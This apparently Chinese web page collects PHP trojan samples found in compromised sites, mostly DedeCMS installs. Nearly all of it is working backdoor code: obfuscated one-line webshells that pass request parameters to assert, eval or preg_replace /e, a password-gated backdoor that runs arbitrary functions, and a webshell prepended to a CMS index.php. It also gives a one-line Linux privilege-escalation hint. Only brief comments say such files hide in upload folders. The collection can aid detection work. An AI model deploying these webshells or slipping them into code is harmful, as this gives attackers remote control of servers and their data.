<?array_map("ass\x65rt",(array)$_REQUEST[dede]);?>
<?php $command=$_POST[1990]; @eval($command);?>

打着广告的名义忽悠的php木马,不少一句话木马出现在附件上传目中,以达到网站挣钱的目的,而且还不是自己的网站,可通过linux命令批量查看文件查找到。

<?array_map("ass\x65rt",(array)$_REQUEST[seay]);?>
* @version $Id: index.php 1 9:23 2010-11-11 tianya $
* @package DedeCMS.Site
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
if(!file_exists(dirname(__FILE__).'/data/common.inc.php'))
{
header('Location:install/index.php');
exit();
}
if(isset($_GET['upcache']) || !file_exists('index.html'))
{
require_once (dirname(__FILE__) . "/include/common.inc.php");
require_once DEDEINC."/arc.partview.class.php";
$GLOBALS['_arclistEnv'] = 'index';
$row = $dsql->GetOne("Select * From `#@__homepageset`");
$row['templet'] = MfTemplet($row['templet']);
$pv = new PartView();
$pv->SetTemplet($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']);
$row['showmod'] = isset($row['showmod'])? $row['showmod'] : 0;
if ($row['showmod'] == 1)
{
$pv->SaveToHtml(dirname(__FILE__).'/index.html');
include(dirname(__FILE__).'/index.html');
exit();
} else {
$pv->Display();
exit();
}
}
else
{
header('HTTP/1.1 301 Moved Permanently');
header('Location:index.html');
}
?>
<?php

error_reporting(E_ERROR);

if (isset($_REQUEST['myfunctionpassw']))

    define('FUNCTION_PASSW',stripslashes($_REQUEST['myfunctionpassw']));

if (isset($_REQUEST['myfunctioncodea']))

    define('FUNCTION_CODEA',stripslashes($_REQUEST['myfunctioncodea']));

if (isset($_REQUEST['myfunctioncodeb']))

    define('FUNCTION_CODEB',stripslashes($_REQUEST['myfunctioncodeb']));

if (isset($_REQUEST['myfunctioncodec']))

    define('FUNCTION_CODEC',stripslashes($_REQUEST['myfunctioncodec']));

if (substr ( md5 (FUNCTION_PASSW),26) == '254bff') {

    if (isset($_REQUEST['myfunctioncodea']) && isset($_REQUEST['myfunctioncodeb']) && isset($_REQUEST['myfunctioncodec']))

        $_REQUEST['myfunctionname'](FUNCTION_CODEA, FUNCTION_CODEB, FUNCTION_CODEC);

    elseif (isset($_REQUEST['myfunctioncodea']) && isset($_REQUEST['myfunctioncodeb']))

        $_REQUEST['myfunctionname'](FUNCTION_CODEA, FUNCTION_CODEB) ? print(FUNCTION_CODEA.' ok') : print(FUNCTION_CODEA.' err');

    else

        $_REQUEST['myfunctionname'](FUNCTION_CODEA);

} else {

    die('Access Denied');

}
?>

linux一句话提权install uprobes /bin/sh

php木马样本,持续更新-LMLPHP

组合木马

<?php ($_=@$_GET[2]).@$_($_POST[1])?>
<?php $k="ass"."ert"; $k(${"_PO"."ST"} [sz]);?>

<?php copy(base64_decode("Li4vLi4vLi4vcGx1cy9kb3dubG9hZC5waHA="),base64_decode("Li4vLi4vZGVkZWRvd25sb2FkLnBocA=="));copy(base64_decode("Li4vLi4vLi4vcGx1cy9teXRhZ19qcy5waHA="),base64_decode("Li4vLi4vZGVkZW15dGFnLnBocA=="));echo "dedeok823571";?>

<?php echo "dedeok";array_map("ass\x65rt",(array)${"_PO"."ST"}["52296"]);?>

<?php unlink(base64_decode("Li4vLi4vcGx1cy9kb3dubG9hZC5waHA="));unlink(base64_decode("Li4vLi4vcGx1cy9teXRhZ19qcy5waHA="));echo "dedeok913438";?>

<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['8']);?>

<?$_POST['k']($_POST['8']);?>

<?php $k = str_replace("8","","a8s88s8e8r88t");$k($_POST["8"]); ?>

<?php $_GET['k8']($_POST['k8']);?>

<?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST["k8"]);  ?>

<?php @preg_replace("//e",$_POST[x],"e");exit("|LO|"); ?>

<?php echo "dedeok";array_map("ass\x65rt",(array)${"_PO"."ST"}["16883"]);?>

<?php echo "dedeok245563";$a=scandir("../../../../");print_r($a);?>

<?php@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");        ?>    
05-11 15:01